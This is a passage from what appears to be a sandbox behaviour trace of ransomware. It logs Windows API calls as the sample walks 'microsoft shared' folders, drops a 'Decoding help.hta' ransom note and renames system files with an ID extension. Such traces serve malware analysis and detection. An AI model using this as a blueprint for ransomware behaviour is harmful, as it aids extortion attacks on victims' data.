(lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0048.871] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tiptsf.dll") returned -1 [0048.871] lstrlenW (lpString="tiptsf.dll") returned 10 [0048.872] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0048.872] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0048.872] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="tiptsf.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll" [0048.872] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll" [0048.872] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0048.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.872] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x232762c6, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x232762c6, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xaf6cd410, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0048.872] lstrcpyW (in: lpString1=0x1116bbc0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0048.872] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0048.872] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0048.872] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0048.872] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tpcps.dll") returned -1 [0048.872] lstrlenW (lpString="tpcps.dll") returned 9 [0048.872] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0048.872] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0048.872] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="tpcps.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll" [0048.872] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll" [0048.872] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0048.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tpcps.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tpcps.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.872] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x232762c6, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x232762c6, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xaf6cd410, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tpcps.dll", cAlternateFileName="")) returned 0 [0048.873] FindClose (in: hFindFile=0x671530 | out: hFindFile=0x671530) returned 1 Thread: id = 302 os_tid = 0x408 [0042.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*.*", lpFindFileData=0x14f9fd30 | out: lpFindFileData=0x14f9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2f30 [0045.293] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.293] FindNextFileW (in: hFindFile=0x5e2f30, lpFindFileData=0x14f9fd30 | out: lpFindFileData=0x14f9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.293] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.293] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.293] FindNextFileW (in: hFindFile=0x5e2f30, lpFindFileData=0x14f9fd30 | out: lpFindFileData=0x14f9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublicAssemblies", cAlternateFileName="PUBLIC~1")) returned 1 [0045.293] lstrcmpW (lpString1=".", lpString2="PublicAssemblies") returned -1 [0045.293] lstrcmpW (lpString1="..", lpString2="PublicAssemblies") returned -1 [0045.293] lstrcmpiW (lpString1="windows", lpString2="PublicAssemblies") returned 1 [0045.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*.*" [0045.293] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*.*") returned 66 [0045.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\", lpString2="PublicAssemblies" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies" [0045.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*" [0045.293] GlobalMemoryStatus (in: lpBuffer=0x14f9fd10 | out: lpBuffer=0x14f9fd10) [0045.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113c4578, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4b8 [0045.309] CloseHandle (hObject=0x4b8) returned 1 [0045.309] FindNextFileW (in: hFindFile=0x5e2f30, lpFindFileData=0x14f9fd30 | out: lpFindFileData=0x14f9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublicAssemblies", cAlternateFileName="PUBLIC~1")) returned 0 [0045.309] FindClose (in: hFindFile=0x5e2f30 | out: hFindFile=0x5e2f30) returned 1 Thread: id = 303 os_tid = 0x55c [0042.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*", lpFindFileData=0x150dfd30 | out: lpFindFileData=0x150dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6713f0 [0042.506] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.506] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x150dfd30 | out: lpFindFileData=0x150dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.506] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.506] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.506] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x150dfd30 | out: lpFindFileData=0x150dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22894196, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0042.506] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0042.506] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0042.506] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0042.589] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*" [0042.589] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*") returned 67 [0042.589] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US" [0042.589] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*" [0042.589] GlobalMemoryStatus (in: lpBuffer=0x150dfd10 | out: lpBuffer=0x150dfd10) [0042.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10cb68d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.593] CloseHandle (hObject=0x658) returned 1 [0042.593] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x150dfd30 | out: lpFindFileData=0x150dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a868239, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a868239, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a868239, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0042.593] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*" [0042.593] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*") returned 67 [0042.593] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\Decoding help.hta" [0042.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\decoding help.hta")) returned 0xffffffff [0042.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x658 [0042.594] WriteFile (in: hFile=0x658, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x150dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x150dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.597] CloseHandle (hObject=0x658) returned 1 [0042.599] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.607] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msinfo32.exe") returned -1 [0042.611] lstrlenW (lpString="msinfo32.exe") returned 12 [0042.614] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*" [0042.618] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*") returned 67 [0042.621] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\", lpString2="msinfo32.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" [0042.621] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" [0042.621] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0042.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\msinfo32.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.629] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x150dfd30 | out: lpFindFileData=0x150dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a868239, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a868239, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a868239, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 0 [0042.629] FindClose (in: hFindFile=0x6713f0 | out: hFindFile=0x6713f0) returned 1 Thread: id = 304 os_tid = 0x644 [0042.461] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*", lpFindFileData=0x1521fd30 | out: lpFindFileData=0x1521fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7a735b0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xb30acfc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb30acfc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671130 [0042.461] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.461] FindNextFileW (in: hFindFile=0x671130, lpFindFileData=0x1521fd30 | out: lpFindFileData=0x1521fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7a735b0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xb30acfc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb30acfc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.461] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.461] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.461] FindNextFileW (in: hFindFile=0x671130, lpFindFileData=0x1521fd30 | out: lpFindFileData=0x1521fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b36970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xba7b1bc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xba7b1bc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0042.461] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0042.461] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0042.461] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0042.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*" [0042.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*") returned 69 [0042.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033" [0042.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*" [0042.462] GlobalMemoryStatus (in: lpBuffer=0x1521fd10 | out: lpBuffer=0x1521fd10) [0042.462] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94f0868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x648 [0042.464] CloseHandle (hObject=0x648) returned 1 [0042.464] FindNextFileW (in: hFindFile=0x671130, lpFindFileData=0x1521fd30 | out: lpFindFileData=0x1521fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a395f00, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0xae3504c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7a395f00, ftLastWriteTime.dwHighDateTime=0x1cbe56c, nFileSizeHigh=0x0, nFileSizeLow=0x35afb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Csi.dll", cAlternateFileName="")) returned 1 [0042.464] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*" [0042.464] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*") returned 69 [0042.464] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Decoding help.hta" [0042.464] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\decoding help.hta")) returned 0xffffffff [0042.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x76c [0043.917] WriteFile (in: hFile=0x76c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1521fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1521fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.918] CloseHandle (hObject=0x76c) returned 1 [0043.918] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0045.309] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Csi.dll") returned 1 [0045.309] lstrlenW (lpString="Csi.dll") returned 7 [0045.309] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*" [0045.309] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*") returned 69 [0045.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\", lpString2="Csi.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll" [0045.309] lstrcatW (in: lpString1="", 